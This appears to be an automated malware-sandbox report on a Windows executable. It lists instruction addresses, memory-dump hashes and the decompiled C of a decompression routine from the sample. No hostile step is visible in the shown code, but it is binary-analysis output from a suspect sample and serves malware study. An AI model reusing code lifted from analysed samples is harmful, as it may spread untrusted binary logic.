                                                                                                                    0x0040620c
                                                                                                                    0x0040620c
                                                                                                                    0x00406221
                                                                                                                    0x00406224
                                                                                                                    0x00406242
                                                                                                                    0x00406244
                                                                                                                    0x00000000
                                                                                                                    0x00406226
                                                                                                                    0x00406226
                                                                                                                    0x00406229
                                                                                                                    0x0040622c
                                                                                                                    0x0040622f
                                                                                                                    0x00406231
                                                                                                                    0x00406231
                                                                                                                    0x00406231
                                                                                                                    0x00406234
                                                                                                                    0x00406237
                                                                                                                    0x00406239
                                                                                                                    0x0040623a
                                                                                                                    0x0040623d
                                                                                                                    0x00000000
                                                                                                                    0x0040623d
                                                                                                                    0x00000000
                                                                                                                    0x00406473
                                                                                                                    0x00406477
                                                                                                                    0x00406495
                                                                                                                    0x00406498
                                                                                                                    0x0040649f
                                                                                                                    0x004064a2
                                                                                                                    0x004064a5
                                                                                                                    0x004064a8
                                                                                                                    0x004064ab
                                                                                                                    0x004064ae
                                                                                                                    0x004064b0
                                                                                                                    0x004064b7
                                                                                                                    0x004064b8
                                                                                                                    0x004064ba
                                                                                                                    0x004064bd
                                                                                                                    0x004064c0
                                                                                                                    0x004064c3
                                                                                                                    0x004064c3
                                                                                                                    0x004064c8
                                                                                                                    0x00000000
                                                                                                                    0x004064c8
                                                                                                                    0x00406479
                                                                                                                    0x0040647c
                                                                                                                    0x0040647f
                                                                                                                    0x00406489
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004064dd
                                                                                                                    0x004064e1
                                                                                                                    0x00406504
                                                                                                                    0x00406507
                                                                                                                    0x0040650a
                                                                                                                    0x00406514
                                                                                                                    0x004064e3
                                                                                                                    0x004064e3
                                                                                                                    0x004064e6
                                                                                                                    0x004064e9
                                                                                                                    0x004064ec
                                                                                                                    0x004064f9
                                                                                                                    0x004064fc
                                                                                                                    0x004064fc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406591
                                                                                                                    0x00406595
                                                                                                                    0x0040659c
                                                                                                                    0x0040659f
                                                                                                                    0x004065a2
                                                                                                                    0x004065ac
                                                                                                                    0x00000000
                                                                                                                    0x004065ac
                                                                                                                    0x00406597
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004065b8
                                                                                                                    0x004065bc
                                                                                                                    0x004065c3
                                                                                                                    0x004065c6
                                                                                                                    0x004065c9
                                                                                                                    0x004065be
                                                                                                                    0x004065be
                                                                                                                    0x004065be
                                                                                                                    0x004065cc
                                                                                                                    0x004065cf
                                                                                                                    0x004065d2
                                                                                                                    0x004065d2
                                                                                                                    0x004065d5
                                                                                                                    0x004065d8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406678
                                                                                                                    0x00406678
                                                                                                                    0x0040667c
                                                                                                                    0x00406a1a
                                                                                                                    0x00000000
                                                                                                                    0x00406a1a
                                                                                                                    0x00406682
                                                                                                                    0x00406685
                                                                                                                    0x00406688
                                                                                                                    0x0040668c
                                                                                                                    0x0040668f
                                                                                                                    0x00406695
                                                                                                                    0x00406697
                                                                                                                    0x00406697
                                                                                                                    0x00406697
                                                                                                                    0x0040669a
                                                                                                                    0x0040669d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040626d
                                                                                                                    0x0040626d
                                                                                                                    0x00406271
                                                                                                                    0x004069de
                                                                                                                    0x00000000
                                                                                                                    0x004069de
                                                                                                                    0x00406277
                                                                                                                    0x0040627a
                                                                                                                    0x0040627d
                                                                                                                    0x00406281
                                                                                                                    0x00406284
                                                                                                                    0x0040628a
                                                                                                                    0x0040628c
                                                                                                                    0x0040628c
                                                                                                                    0x0040628c
                                                                                                                    0x0040628f
                                                                                                                    0x00406292
                                                                                                                    0x00406292
                                                                                                                    0x00406295
                                                                                                                    0x00406298
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040629e
                                                                                                                    0x004062a4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004062aa
                                                                                                                    0x004062aa
                                                                                                                    0x004062ae
                                                                                                                    0x004062b1
                                                                                                                    0x004062b4
                                                                                                                    0x004062b7
                                                                                                                    0x004062ba
                                                                                                                    0x004062bb
                                                                                                                    0x004062be
                                                                                                                    0x004062c0
                                                                                                                    0x004062c6
                                                                                                                    0x004062c9
                                                                                                                    0x004062cc
                                                                                                                    0x004062cf
                                                                                                                    0x004062d2
                                                                                                                    0x004062d5
                                                                                                                    0x004062d8
                                                                                                                    0x004062f4
                                                                                                                    0x004062f7
                                                                                                                    0x004062fa
                                                                                                                    0x004062fd
                                                                                                                    0x00406304
                                                                                                                    0x00406308
                                                                                                                    0x0040630a
                                                                                                                    0x0040630e
                                                                                                                    0x004062da
                                                                                                                    0x004062da
                                                                                                                    0x004062de
                                                                                                                    0x004062e6
                                                                                                                    0x004062eb
                                                                                                                    0x004062ed
                                                                                                                    0x004062ef
                                                                                                                    0x004062ef
                                                                                                                    0x00406311
                                                                                                                    0x00406318
                                                                                                                    0x0040631b
                                                                                                                    0x00000000
                                                                                                                    0x00406321
                                                                                                                    0x00000000
                                                                                                                    0x00406321
                                                                                                                    0x00000000
                                                                                                                    0x00406326
                                                                                                                    0x00406326
                                                                                                                    0x0040632a
                                                                                                                    0x004069ea
                                                                                                                    0x00000000
                                                                                                                    0x004069ea
                                                                                                                    0x00406330
                                                                                                                    0x00406333
                                                                                                                    0x00406336
                                                                                                                    0x0040633a
                                                                                                                    0x0040633d
                                                                                                                    0x00406343
                                                                                                                    0x00406345
                                                                                                                    0x00406345
                                                                                                                    0x00406345
                                                                                                                    0x00406348
                                                                                                                    0x0040634b
                                                                                                                    0x0040634b
                                                                                                                    0x0040634b
                                                                                                                    0x00406351
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406353
                                                                                                                    0x00406356
                                                                                                                    0x00406359
                                                                                                                    0x0040635c
                                                                                                                    0x0040635f
                                                                                                                    0x00406362
                                                                                                                    0x00406365
                                                                                                                    0x00406368
                                                                                                                    0x0040636b
                                                                                                                    0x0040636e
                                                                                                                    0x00406371
                                                                                                                    0x00406389
                                                                                                                    0x0040638c
                                                                                                                    0x0040638f
                                                                                                                    0x00406392
                                                                                                                    0x00406392
                                                                                                                    0x00406395
                                                                                                                    0x00406399
                                                                                                                    0x0040639b
                                                                                                                    0x00406373
                                                                                                                    0x00406373
                                                                                                                    0x0040637b
                                                                                                                    0x00406380
                                                                                                                    0x00406382
                                                                                                                    0x00406384
                                                                                                                    0x00406384
                                                                                                                    0x0040639e
                                                                                                                    0x004063a5
                                                                                                                    0x004063a8
                                                                                                                    0x00000000
                                                                                                                    0x004063aa
                                                                                                                    0x00000000
                                                                                                                    0x004063aa
                                                                                                                    0x004063a8
                                                                                                                    0x004063af
                                                                                                                    0x004063af
                                                                                                                    0x004063af
                                                                                                                    0x004063af
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004063ea
                                                                                                                    0x004063ea
                                                                                                                    0x004063ee
                                                                                                                    0x004069f6
                                                                                                                    0x00000000
                                                                                                                    0x004069f6
                                                                                                                    0x004063f4
                                                                                                                    0x004063f7
                                                                                                                    0x004063fa
                                                                                                                    0x004063fe
                                                                                                                    0x00406401
                                                                                                                    0x00406407
                                                                                                                    0x00406409
                                                                                                                    0x00406409
                                                                                                                    0x00406409
                                                                                                                    0x0040640c
                                                                                                                    0x0040640f
                                                                                                                    0x0040640f
                                                                                                                    0x00406415
                                                                                                                    0x004063b3
                                                                                                                    0x004063b3
                                                                                                                    0x004063b6
                                                                                                                    0x00000000
                                                                                                                    0x004063b6
                                                                                                                    0x00406417
                                                                                                                    0x00406417
                                                                                                                    0x0040641a
                                                                                                                    0x0040641d
                                                                                                                    0x00406420
                                                                                                                    0x00406423
                                                                                                                    0x00406426
                                                                                                                    0x00406429
                                                                                                                    0x0040642c
                                                                                                                    0x0040642f
                                                                                                                    0x00406432
                                                                                                                    0x00406435
                                                                                                                    0x0040644d
                                                                                                                    0x00406450
                                                                                                                    0x00406453
                                                                                                                    0x00406456
                                                                                                                    0x00406456
                                                                                                                    0x00406459
                                                                                                                    0x0040645d
                                                                                                                    0x0040645f
                                                                                                                    0x00406437
                                                                                                                    0x00406437
                                                                                                                    0x0040643f
                                                                                                                    0x00406444
                                                                                                                    0x00406446
                                                                                                                    0x00406448
                                                                                                                    0x00406448
                                                                                                                    0x00406462
                                                                                                                    0x00406469
                                                                                                                    0x0040646c
                                                                                                                    0x00000000
                                                                                                                    0x0040646e
                                                                                                                    0x00000000
                                                                                                                    0x0040646e
                                                                                                                    0x00000000
                                                                                                                    0x004066fb
                                                                                                                    0x004066fb
                                                                                                                    0x004066ff
                                                                                                                    0x00406a26
                                                                                                                    0x00000000
                                                                                                                    0x00406a26
                                                                                                                    0x00406705
                                                                                                                    0x00406708
                                                                                                                    0x0040670b
                                                                                                                    0x0040670f
                                                                                                                    0x00406712
                                                                                                                    0x00406718
                                                                                                                    0x0040671a
                                                                                                                    0x0040671a
                                                                                                                    0x0040671a
                                                                                                                    0x0040671d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040680a
                                                                                                                    0x0040680e
                                                                                                                    0x00406830
                                                                                                                    0x00406833
                                                                                                                    0x0040683d
                                                                                                                    0x00000000
                                                                                                                    0x0040683d
                                                                                                                    0x00406810
                                                                                                                    0x00406813
                                                                                                                    0x00406817
                                                                                                                    0x0040681a
                                                                                                                    0x0040681a
                                                                                                                    0x0040681d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004068c7
                                                                                                                    0x004068cb
                                                                                                                    0x004068e9
                                                                                                                    0x004068e9
                                                                                                                    0x004068e9
                                                                                                                    0x004068f0
                                                                                                                    0x004068f7
                                                                                                                    0x004068fe
                                                                                                                    0x004068fe
                                                                                                                    0x00000000
                                                                                                                    0x004068fe
                                                                                                                    0x004068cd
                                                                                                                    0x004068d0
                                                                                                                    0x004068d3
                                                                                                                    0x004068d6
                                                                                                                    0x004068dd
                                                                                                                    0x00406821
                                                                                                                    0x00406821
                                                                                                                    0x00406824
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004069b8
                                                                                                                    0x004069bb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004065f2
                                                                                                                    0x004065f4
                                                                                                                    0x004065fb
                                                                                                                    0x004065fc
                                                                                                                    0x004065fe
                                                                                                                    0x00406601
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406609
                                                                                                                    0x0040660c
                                                                                                                    0x0040660f
                                                                                                                    0x00406611
                                                                                                                    0x00406613
                                                                                                                    0x00406613
                                                                                                                    0x00406614
                                                                                                                    0x00406617
                                                                                                                    0x0040661e
                                                                                                                    0x00406621
                                                                                                                    0x0040662f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406905
                                                                                                                    0x00406905
                                                                                                                    0x00406908
                                                                                                                    0x0040690f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406914
                                                                                                                    0x00406914
                                                                                                                    0x00406918
                                                                                                                    0x00406a50
                                                                                                                    0x00000000
                                                                                                                    0x00406a50
                                                                                                                    0x0040691e
                                                                                                                    0x00406921
                                                                                                                    0x00406924
                                                                                                                    0x00406928
                                                                                                                    0x0040692b
                                                                                                                    0x00406931
                                                                                                                    0x00406933
                                                                                                                    0x00406933
                                                                                                                    0x00406933
                                                                                                                    0x00406936
                                                                                                                    0x00406939
                                                                                                                    0x00406939
                                                                                                                    0x00406939
                                                                                                                    0x00406939
                                                                                                                    0x0040693c
                                                                                                                    0x0040693c
                                                                                                                    0x00406940
                                                                                                                    0x004069a0
                                                                                                                    0x004069a3
                                                                                                                    0x004069a8
                                                                                                                    0x004069a9
                                                                                                                    0x004069ab
                                                                                                                    0x004069ad
                                                                                                                    0x004069b0
                                                                                                                    0x00000000
                                                                                                                    0x004069b0
                                                                                                                    0x00406942
                                                                                                                    0x00406948
                                                                                                                    0x0040694b
                                                                                                                    0x0040694e
                                                                                                                    0x00406951
                                                                                                                    0x00406954
                                                                                                                    0x00406957
                                                                                                                    0x0040695a
                                                                                                                    0x0040695d
                                                                                                                    0x00406960
                                                                                                                    0x00406963
                                                                                                                    0x0040697c
                                                                                                                    0x0040697f
                                                                                                                    0x00406982
                                                                                                                    0x00406985
                                                                                                                    0x00406989
                                                                                                                    0x0040698b
                                                                                                                    0x0040698b
                                                                                                                    0x0040698c
                                                                                                                    0x0040698f
                                                                                                                    0x00406965
                                                                                                                    0x00406965
                                                                                                                    0x0040696d
                                                                                                                    0x00406972
                                                                                                                    0x00406974
                                                                                                                    0x00406977
                                                                                                                    0x00406977
                                                                                                                    0x00406992
                                                                                                                    0x00406999
                                                                                                                    0x00000000
                                                                                                                    0x0040699b
                                                                                                                    0x00000000
                                                                                                                    0x0040699b
                                                                                                                    0x00000000
                                                                                                                    0x00406637
                                                                                                                    0x0040663a
                                                                                                                    0x00406670
                                                                                                                    0x004067a0
                                                                                                                    0x004067a0
                                                                                                                    0x004067a0
                                                                                                                    0x004067a0
                                                                                                                    0x004067a3
                                                                                                                    0x004067a3
                                                                                                                    0x004067a6
                                                                                                                    0x004067a8
                                                                                                                    0x00406a32
                                                                                                                    0x00000000
                                                                                                                    0x00406a32
                                                                                                                    0x004067ae
                                                                                                                    0x004067b1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004067b7
                                                                                                                    0x004067bb
                                                                                                                    0x004067be
                                                                                                                    0x004067be
                                                                                                                    0x004067be
                                                                                                                    0x00000000
                                                                                                                    0x004067be
                                                                                                                    0x0040663c
                                                                                                                    0x0040663e
                                                                                                                    0x00406640
                                                                                                                    0x00406642
                                                                                                                    0x00406645
                                                                                                                    0x00406646
                                                                                                                    0x00406648
                                                                                                                    0x0040664a
                                                                                                                    0x0040664d
                                                                                                                    0x00406650
                                                                                                                    0x00406666
                                                                                                                    0x0040666b
                                                                                                                    0x004066a3
                                                                                                                    0x004066a3
                                                                                                                    0x004066a7
                                                                                                                    0x004066d3
                                                                                                                    0x004066d5
                                                                                                                    0x004066dc
                                                                                                                    0x004066df
                                                                                                                    0x004066e2
                                                                                                                    0x004066e2
                                                                                                                    0x004066e7
                                                                                                                    0x004066e7
                                                                                                                    0x004066e9
                                                                                                                    0x004066ec
                                                                                                                    0x004066f3
                                                                                                                    0x004066f6
                                                                                                                    0x00406723
                                                                                                                    0x00406723
                                                                                                                    0x00406726
                                                                                                                    0x00406729
                                                                                                                    0x0040679d
                                                                                                                    0x0040679d
                                                                                                                    0x0040679d
                                                                                                                    0x00000000
                                                                                                                    0x0040679d
                                                                                                                    0x0040672b
                                                                                                                    0x00406731
                                                                                                                    0x00406734
                                                                                                                    0x00406737
                                                                                                                    0x0040673a
                                                                                                                    0x0040673d
                                                                                                                    0x00406740
                                                                                                                    0x00406743
                                                                                                                    0x00406746
                                                                                                                    0x00406749
                                                                                                                    0x0040674c
                                                                                                                    0x00406765
                                                                                                                    0x00406767
                                                                                                                    0x0040676a
                                                                                                                    0x0040676b
                                                                                                                    0x0040676e
                                                                                                                    0x00406770
                                                                                                                    0x00406773
                                                                                                                    0x00406775
                                                                                                                    0x00406777
                                                                                                                    0x0040677a
                                                                                                                    0x0040677c
                                                                                                                    0x0040677f
                                                                                                                    0x00406783
                                                                                                                    0x00406785
                                                                                                                    0x00406785
                                                                                                                    0x00406786
                                                                                                                    0x00406789
                                                                                                                    0x0040678c
                                                                                                                    0x0040674e
                                                                                                                    0x0040674e
                                                                                                                    0x00406756
                                                                                                                    0x0040675b
                                                                                                                    0x0040675d
                                                                                                                    0x00406760
                                                                                                                    0x00406760
                                                                                                                    0x0040678f
                                                                                                                    0x00406796
                                                                                                                    0x00406720
                                                                                                                    0x00406720
                                                                                                                    0x00406720
                                                                                                                    0x00406720
                                                                                                                    0x00000000
                                                                                                                    0x00406798
                                                                                                                    0x00000000
                                                                                                                    0x00406798
                                                                                                                    0x00406796
                                                                                                                    0x004066a9
                                                                                                                    0x004066ac
                                                                                                                    0x004066ae
                                                                                                                    0x004066b1
                                                                                                                    0x004066b4
                                                                                                                    0x004066b7
                                                                                                                    0x004066b9
                                                                                                                    0x004066bc
                                                                                                                    0x004066bf
                                                                                                                    0x004066bf
                                                                                                                    0x004066c2
                                                                                                                    0x004066c2
                                                                                                                    0x004066c5
                                                                                                                    0x004066cc
                                                                                                                    0x004066a0
                                                                                                                    0x004066a0
                                                                                                                    0x004066a0
                                                                                                                    0x004066a0
                                                                                                                    0x00000000
                                                                                                                    0x004066ce
                                                                                                                    0x00000000
                                                                                                                    0x004066ce
                                                                                                                    0x004066cc
                                                                                                                    0x00406652
                                                                                                                    0x00406655
                                                                                                                    0x00406657
                                                                                                                    0x0040665a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004063b9
                                                                                                                    0x004063b9
                                                                                                                    0x004063bd
                                                                                                                    0x00406a02
                                                                                                                    0x00000000
                                                                                                                    0x00406a02
                                                                                                                    0x004063c3
                                                                                                                    0x004063c6
                                                                                                                    0x004063c9
                                                                                                                    0x004063cc
                                                                                                                    0x004063cf
                                                                                                                    0x004063d2
                                                                                                                    0x004063d5
                                                                                                                    0x004063d7
                                                                                                                    0x004063da
                                                                                                                    0x004063dd
                                                                                                                    0x004063e0
                                                                                                                    0x004063e2
                                                                                                                    0x004063e2
                                                                                                                    0x004063e2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004067c1
                                                                                                                    0x004067c1
                                                                                                                    0x004067c1
                                                                                                                    0x004067c5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004067cb
                                                                                                                    0x004067ce
                                                                                                                    0x004067d1
                                                                                                                    0x004067d4
                                                                                                                    0x004067d6
                                                                                                                    0x004067d6
                                                                                                                    0x004067d6
                                                                                                                    0x004067d9
                                                                                                                    0x004067dc
                                                                                                                    0x004067df
                                                                                                                    0x004067e2
                                                                                                                    0x004067e5
                                                                                                                    0x004067e8
                                                                                                                    0x004067e9
                                                                                                                    0x004067eb
                                                                                                                    0x004067eb
                                                                                                                    0x004067eb
                                                                                                                    0x004067ee
                                                                                                                    0x004067f1
                                                                                                                    0x004067f4
                                                                                                                    0x004067f7
                                                                                                                    0x004067fa
                                                                                                                    0x004067fe
                                                                                                                    0x00406800
                                                                                                                    0x00406803
                                                                                                                    0x00000000
                                                                                                                    0x00406805
                                                                                                                    0x00000000
                                                                                                                    0x00406805
                                                                                                                    0x00406803
                                                                                                                    0x00406a38
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406067

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                                                                                                                    • Instruction ID: 178f069459afe4b8f6f8f854f87fc4d5347ab2ec506c5a0858b6a976d85c5aaa
                                                                                                                    • Opcode Fuzzy Hash: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                                                                                                                    • Instruction Fuzzy Hash: 8E816871E00228CFDF24DFA8C8447ADBBB1FB45301F25816AD816BB281C7785A96DF44
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00406025, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 98%
                                                                                                                    			E00406025(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00406A77))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12); // executed
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
